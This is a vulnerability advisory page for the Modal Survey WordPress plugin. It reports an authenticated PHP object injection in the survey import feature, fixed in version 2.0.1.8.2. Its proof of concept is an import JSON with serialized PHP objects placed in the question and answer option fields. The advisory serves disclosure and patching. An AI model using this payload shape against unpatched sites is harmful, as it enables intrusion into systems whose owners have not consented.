Modal Survey < 2.0.1.8.2 – Authenticated PHP Object Injection | Plugin Vulnerabilities

Description

The Unserialize() function is used multiple times in the code, for example when importing custom surveys. This could allow a malicious administrator to import a crafted JSON to trigger a PHP Object Injection vulnerability

Proof of Concept

{
   "name":"Open Text Answer Sample",
   "id":"924478511",
   "options":"[]",
   "global":"0",
   "start_time":"0000-00-00 00:00:00",
   "expiry_time":"0000-00-00 00:00:00",
   "export_time":"2020-12-21 01:08",
   "questions":{
      "1":{
         "name":"How fast is our support? [-]",
         "count":0,
         "qoptions":"O:21:\"Object_Injection_func\":0:{}",
         "1":{
            "answer":"Very slow [Speed]",
            "count":"0",
            "aoptions":"O:21:\"Object_Injection_func\":0:{}",
            "percentage":"0",
            "uniqueid":"2646920000000"
         }
      }
   }
}

Affects Plugins

Fixed in 2.0.1.8.2

References

URL

http://modalsurvey.pantherius.com/documentation/#line14

Classification

Type

OBJECT INJECTION

OWASP top 10

A8: Insecure Deserialization

CWE

CVSS

Miscellaneous

Original Researcher

Pagely

Submitter

John Castro

Submitter website

https://pagely.com/

Submitter twitter

Verified

Yes

WPVDB ID

05dbd5a0-af45-40fa-a027-fc8f9dd9a706

Timeline

Publicly Published

2021-01-08 (about 5 years ago)

Added

2021-01-08 (about 5 years ago)

Last Updated

2021-01-10 (about 5 years ago)

Other

Published

Title

Published

2026-02-09

Title

Travelicious < 1.6.7 - Unauthenticated PHP Object Injection

Published

2025-07-07

Title

CoSchool LMS <= 1.4.3 - Unauthenticated PHP Object Injection

Published

2025-05-07

Title

WP-CRM System < 3.4.6 - Authenticated (Administrator+) PHP Object Injection

Published

2024-05-14

Title

Order Export & Order Import for WooCommerce < 2.5.0 - Authenticated (Administrator+) PHP Object Injection

Published

2022-08-16

Title

Broken Link Checker < 1.11.17 - Admin+ PHAR Deserialization